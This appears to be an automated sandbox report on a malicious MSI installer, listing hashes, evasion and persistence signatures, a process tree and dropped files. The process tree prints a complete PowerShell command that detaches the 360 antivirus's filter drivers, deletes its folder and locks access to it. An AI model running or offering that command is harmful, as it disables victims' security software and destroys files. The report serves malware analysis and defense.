Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    12/07/2024, 17:57

General

  • Target

    Enigma_lnst.msi

  • Size

    186.9MB

  • MD5

    1befc9492cae2fa2ff5a89177e9d3063

  • SHA1

    061f689bb3802cf3da9cb5f8658beb5895d5650f

  • SHA256

    90cee7a2160a5506535b05a1da860b3db9270154a27b4614001a73921eb516f3

  • SHA512

    c199d79049af3c486fcbe35d6ae0825a8c2cae134fec4fe740c55c3677b29b7527958aaaf1c44890472af0a8d9e0e0db1ed96ca979da0619e089ff2486038243

  • SSDEEP

    3145728:L7y8IlnJhDfWQ3yIe3EPleGEHmdygafuvI2tc9XzlRn6lF+RQ+ZspLkOvnkBM+k6:i8oDfW6yIpPwGEHmdafuvXc9Bpe+S+6y

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 11 IoCs
  • Executes dropped EXE 3 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Loads dropped DLL 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 1 TTPs 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Enigma_lnst.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4120
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4616
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      PID:4472
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 93DE0A49FCB79BBEE6CAD9CA24428C23
      2⤵
      • Loads dropped DLL
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:884
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\SysWOW64\cmd.exe" /c "fltmc.exe && exit 0||exit 1"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4104
        • C:\Windows\SysWOW64\fltMC.exe
          fltmc.exe
          4⤵
          PID:1936
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360安全卫士*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'360safe_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
        3⤵
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4704
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'360sd_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
        3⤵
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3624
      • C:\ProgramData\Data\un.exe
        "C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar qbcore.dll C:\ProgramData\
        3⤵
        • Executes dropped EXE
        PID:3152
      • C:\ProgramData\Data\un.exe
        "C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\
        3⤵
        • Executes dropped EXE
        PID:3012
      • C:\ProgramData\iusb3mon.exe
        "C:\ProgramData\iusb3mon.exe" false
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Adds Run key to start application
        • Checks computer location settings
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1516
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c echo.>c:\odbc.inst.ini
          4⤵
          PID:2104
        • C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\System32\rundll32.exe" C:\ProgramData\qbcore.dll,cef_v8value_create_string
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          PID:4876
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c echo.>c:\inst.ini
          4⤵
          PID:2184
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:2640
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:2676

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Config.Msi\e57e020.rbs
    Filesize: 10KB
    MD5: 65d5af85679d97a938a6b16357b68473
    SHA1: ac6389ab0a70232fb1d98d0c39f8ef606ffa8596
    SHA256: af68e5eccb79d3b61f60bec508b06b3ebb242cac0819322fff84aeb3a025d8e1
    SHA512: bbf9b913801e609b36a8703ee40b3f261f0db081a1af33365cdb7872ce4c4d4ef4287352b7208719842b4c20ebb9686ef5e8f3d4fbe3c658a2c9fe04015af9cb

  • C:\ProgramData\Data\rar.ini
    Filesize: 10B
    MD5: 51c11db1054dd4650a33bf481ec27060
    SHA1: 17686b75163d8753be27e407aad97a76f311fc7b
    SHA256: fc835086345b170ac995c35f24546e1b7268e3d3524a125a9396a4ec8b7d3f35
    SHA512: 94d5c2a0cb03b38657bab246a695c6528fc5f7d3ddbe716641dd59ec83a67d6ab28c083000026d10114e7ab8f8225f7c90c9fce25ef0611f46aa3899d096d80f

  • C:\ProgramData\Data\un.exe
    Filesize: 601KB
    MD5: 4fdc31997eb40979967fc04d9a9960f3
    SHA1: 7f13bd62c13324681913304644489bb6b66f584a
    SHA256: e9ea78fab020718cb75a116993bfa2a5fe71c163a801995adb9e5abebc7990a2
    SHA512: 15146e24afcfea221616ca1f049d96e8a5f9b1eccefd3a27df150e4699993889fc1ab4952f2ba1ab519b1056baaeeb4490894bc795d0cb4630f663fa08316b9a

  • C:\ProgramData\Data\upx.rar
    Filesize: 2.3MB
    MD5: 6902353b10ae3b51d0d4dce6711bdc5e
    SHA1: 2c4abeda0be51037d90abdd22ce46660dc84a0fb
    SHA256: 525c842b1e10058e35b28593bcf2efd8b62e0587d5e0fc27e4289cdafaa9119a
    SHA512: fb7d0590934ee8cb28dca9b4e0c3d2ee751ecfeeaaa5d399cc01c147c1ff051b58b23f88bced572000db8516ec47b84c6a6604131d69a6dd9e80c010b482b047

  • C:\ProgramData\Microsoft\Program\ziliao.jpg
    Filesize: 356KB
    MD5: fae472e4f35ea37d87ec8e75f8f87424
    SHA1: dc4cecc39dcda0f27208d976f4c890aca60d38de
    SHA256: ece4bdb4d10691514983e689e00fe376cd96d47b59c19d418514df6e075635b0
    SHA512: 6bdc5e60d917007c5970cde0fe0d8bdbaa6285e8351968bba0db5c42230448a2d6028e4f1d29bfbb72224a7bdc10c85d45614a113896d4eaebead949990df845

  • C:\ProgramData\iusb3mon.exe
    Filesize: 604KB
    MD5: 75ff06aa5acfa803ad99b4fdcc43dd68
    SHA1: 8a120948f1e30fa8a2ef0d839c5300bbdfa9a8e4
    SHA256: a09ee1f7481c2f215c3a1d2335c5181fcf52eea7c9d82bb885cb14dc419d4e51
    SHA512: 71216288e436dab8d824cd9eb300286095687d855f5beb4e2732a8ef90c7536fad2d82ee61373e85a65a8950ce5979757518578d522bad6bd8496b363b9ead3c

  • C:\ProgramData\qbcore.dll
    Filesize: 2.7MB
    MD5: c31ab7e7b6832f1b99d6914e1594eb6d
    SHA1: ccc6f7e864548b9a7cbb5118c75e5f90db14ac5d
    SHA256: 3bda309984263aa5517dec01fbed324aaec44b514173aa7263cc9d2e0d2a5e73
    SHA512: ff358abab061cc85bb1f51fc6a4a954f46bcf79863728c83b023cecfda2e7f4b61b8d30fe609af3f7bf01b2c23be417eb22f71d7e68b35749d78b85083469f99

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize: 1KB
    MD5: def65711d78669d7f8e69313be4acf2e
    SHA1: 6522ebf1de09eeb981e270bd95114bc69a49cda6
    SHA256: aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
    SHA512: 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 16KB
    MD5: 0e5c309790822c256e0386bae40fdb4d
    SHA1: 915d7770b22ed734cae57dcb50b403ccf5e23628
    SHA256: 92700714dc349086d41e7fd278e6366242eb745a93ce3dbcc7ab55dbf4fdd8cf
    SHA512: 2f8dd04ac522a5216688e236da9582911539d542daa7e139bc94974884d3aba435ac919f42a7106965778f2734c0b25f2a8f0731540900683b7b3d77da7ad58e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_enrcpinf.03h.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Windows\Installer\MSIE138.tmp
    Filesize: 990KB
    MD5: b9ff2dd6924711531e59e90581cda548
    SHA1: 6c8d572587c40a1fd8c20bd4f1929bb0fbb12009
    SHA256: ad564d4d64bb74ea6819e081534131f6f78e3c019d37abbc3eef8e09dfed96d7
    SHA512: d026c8128c1a182aa7f9d7cba179b411ad679e3bf89723a3498ab493cb6938579ee703ade35595f6b5178413e0df7f6f9a152a5036759e42f1d6f52cc0a61227

  • C:\odbc.inst.ini
    Filesize: 2B
    MD5: 81051bcc2cf1bedf378224b0a93e2877
    SHA1: ba8ab5a0280b953aa97435ff8946cbcbb2755a27
    SHA256: 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
    SHA512: 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

  • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
    Filesize: 23.7MB
    MD5: cfd7b17cde52d2aabdafc5fbe8c22eca
    SHA1: a739b299e81991c50f567b62795e715bb238f14e
    SHA256: fc9b9c75ca9aa253627bf27ce87c77cfe51184153cfa9cd7febb24fbb97c7796
    SHA512: 0e5cda7c2699f8404e5b2b7086bda0619cf390737480a3aa019bff27f954f934c51365aae2915d405bf5a6e927d7da0b229a586b2a50c16720d51254be93fcdd

  • \??\Volume{1a5e5195-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{cf028c4a-7b9b-4629-a2cb-55f6111428c0}_OnDiskSnapshotProp
    Filesize: 6KB
    MD5: 60655917a1eea18e7ba977ca59c86b26
    SHA1: 22c24567fd0121a2d6d214fe5011f937d7836606
    SHA256: 5bd39a2532199284b7ca66d88d6536a02784e879d922eaf968764b1899da2a30
    SHA512: cd954f153ac5865c890d1d579c4086714a974c51f359c42e21714afc3e48ffe7491db1bef66a6a285a3da24d417037312451e0daf9cebe4cbcec2c838b789a73

  • memory/1516-91-0x0000000074080000-0x0000000074339000-memory.dmp
    Filesize: 2.7MB

  • memory/1516-124-0x0000000074080000-0x0000000074339000-memory.dmp
    Filesize: 2.7MB

  • memory/1516-120-0x0000000074080000-0x0000000074339000-memory.dmp
    Filesize: 2.7MB

  • memory/1516-101-0x0000000010000000-0x0000000010061000-memory.dmp
    Filesize: 388KB

  • memory/3624-21-0x0000000005F00000-0x0000000006254000-memory.dmp
    Filesize: 3.3MB

  • memory/3624-58-0x0000000006A50000-0x0000000006A72000-memory.dmp
    Filesize: 136KB

  • memory/3624-15-0x0000000005E90000-0x0000000005EF6000-memory.dmp
    Filesize: 408KB

  • memory/3624-53-0x00000000074B0000-0x0000000007546000-memory.dmp
    Filesize: 600KB

  • memory/3624-13-0x0000000005500000-0x0000000005522000-memory.dmp
    Filesize: 136KB

  • memory/3624-57-0x0000000006A00000-0x0000000006A1A000-memory.dmp
    Filesize: 104KB

  • memory/3624-11-0x0000000002BB0000-0x0000000002BE6000-memory.dmp
    Filesize: 216KB

  • memory/3624-14-0x0000000005D30000-0x0000000005D96000-memory.dmp
    Filesize: 408KB

  • memory/4704-68-0x0000000007CB0000-0x0000000008254000-memory.dmp
    Filesize: 5.6MB

  • memory/4704-37-0x0000000006640000-0x000000000665E000-memory.dmp
    Filesize: 120KB

  • memory/4704-39-0x0000000006670000-0x00000000066BC000-memory.dmp
    Filesize: 304KB

  • memory/4704-12-0x0000000005850000-0x0000000005E78000-memory.dmp
    Filesize: 6.2MB

  • memory/4876-99-0x0000000074080000-0x0000000074339000-memory.dmp
    Filesize: 2.7MB

  • memory/4876-121-0x0000000074080000-0x0000000074339000-memory.dmp
    Filesize: 2.7MB

  • memory/4876-142-0x0000000074080000-0x0000000074339000-memory.dmp
    Filesize: 2.7MB